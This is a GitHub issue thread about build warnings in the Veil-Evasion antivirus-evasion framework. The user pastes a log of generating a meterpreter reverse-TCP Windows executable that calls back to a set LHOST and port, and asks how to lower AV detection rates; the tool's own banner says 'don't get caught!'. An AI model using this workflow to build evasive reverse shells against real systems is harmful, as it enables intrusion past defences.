### ISSUE TITLE
P11 kit and UPX issue

### ISSUE THREAD

**Issue by Nickpete** [Veil-Framework/Veil-Evasion#169]
Hi, I recently installed Veil evasion on my kali linux distro. I have everything updated, and veil is version 2.2 .
When I generate a payload, it is being created in the right place, but I get those error messages in the terminal:
 [>] Please enter the number of your choice: 
p11-kit: couldn't load module: /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so: /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so: cannot open shared object file: No such file or directory
err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
85 INFO: wrote Z:\usr\share\veil-evasion\payload12.spec
129 INFO: Testing for ability to set icons, version resources...
141 INFO: ... resource update available
147 INFO: UPX is not available.

Then, everything sems to go fine. I installed pk11-kit through apt-get, and updated it all, but still the same error message. I have checked, and, /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so is right there at the specifid path. Is it connected with the UPX not available message? 
Do you hav any idea of what I can do to fix that, and also, if it has an influence on the AV detection rate I would then get?
Thanks a lot for your time.

**Comment by Nickpete** [comment]
I have decided to paste the whole terminal output, because I have noticed there is more error messages. Thanks again.


 [>] Please enter a command: set LHOST 192.168.100.1
 [>] Please enter a command: generate

=========================================================================
 Veil-Evasion | [Version]: 2.20
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 [*] Press [enter] for 'payload'
 [>] Please enter the base name for output files: 

 [?] How would you like to create your payload executable?

     1 - Pyinstaller (default)
     2 - Pwnstaller (obfuscated Pyinstaller loader)
     3 - Py2Exe

 [>] Please enter the number of your choice: 
p11-kit: couldn't load module: /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so: /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so: cannot open shared object file: No such file or directory
err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
85 INFO: wrote Z:\usr\share\veil-evasion\payload12.spec
129 INFO: Testing for ability to set icons, version resources...
141 INFO: ... resource update available
147 INFO: UPX is not available.
2250 INFO: checking Analysis
2252 INFO: building Analysis because out00-Analysis.toc non existent
2253 INFO: running Analysis out00-Analysis.toc
2254 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
2263 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
2263 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest
2266 INFO: Searching for file msvcr90.dll
2267 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll
2269 INFO: Searching for file msvcp90.dll
2270 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll
2272 INFO: Searching for file msvcm90.dll
2273 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll
2415 INFO: Analyzing Z:\usr\share\pyinstaller\support\_pyi_bootstrap.py
4285 INFO: Analyzing Z:\usr\share\pyinstaller\PyInstaller\loader\archive.py
4487 INFO: Analyzing Z:\usr\share\pyinstaller\PyInstaller\loader\carchive.py
4710 INFO: Analyzing Z:\usr\share\pyinstaller\PyInstaller\loader\iu.py
4769 INFO: Analyzing /usr/share/veil-output/source/payload12.py
4999 INFO: Hidden import 'encodings' has been found otherwise
5000 INFO: Looking for run-time hooks
5000 INFO: Analyzing rthook Z:\usr\share\pyinstaller\support/rthooks/pyi_rth_encodings.py
5650 INFO: Warnings written to Z:\usr\share\veil-evasion\build\pyi.win32\payload12\warnpayload12.txt
5657 INFO: checking PYZ
5658 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
5660 INFO: building PYZ out00-PYZ.toc
6616 INFO: checking PKG
6618 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
6621 INFO: building PKG out00-PKG.pkg
7927 INFO: checking EXE
7930 INFO: rebuilding out00-EXE.toc because payload12.exe missing
7934 INFO: building EXE from out00-EXE.toc
7947 INFO: Appending archive to EXE Z:\usr\share\veil-evasion\dist\payload12.exe

=========================================================================
 Veil-Evasion | [Version]: 2.20
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================


 [*] Executable written to: /usr/share/veil-output/compiled/payload12.exe

 Language:		python
 Payload:		python/meterpreter/rev_tcp
 Required Options:      LHOST=192.168.100.1  LPORT=4444  architecture=32
                        compile_to_exe=Y  expire_payload=X  use_pyherion=N
 Payload File:		/usr/share/veil-output/source/payload12.py
 Handler File:		/usr/share/veil-output/handlers/payload12_handler.rc


 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ;)

 [>] press any key to return to the main menu:

**Comment by ChrisTruncer** [comment]
This is normal output. Please for any future issues, post all code to pastebin and put the link here, instead of pasting everything here.

**Comment by Nickpete** [comment]
Ok, sorry for not using the pastebin. so, there is no problem with the 'p11-kit:couldnot load module' message then. Thanks for the info.
So even though I find the work put into this framework, remarkable, and my intent is in no way to criticize a work I personally would not be able to do, I thought this was the explanation why the AV detection I get with the modules is always above 50% .. This is just a normal thing in this cat and mouse game with AVs?
And do not worry, I never scanned through VT, or this type of scanners that distribute results..
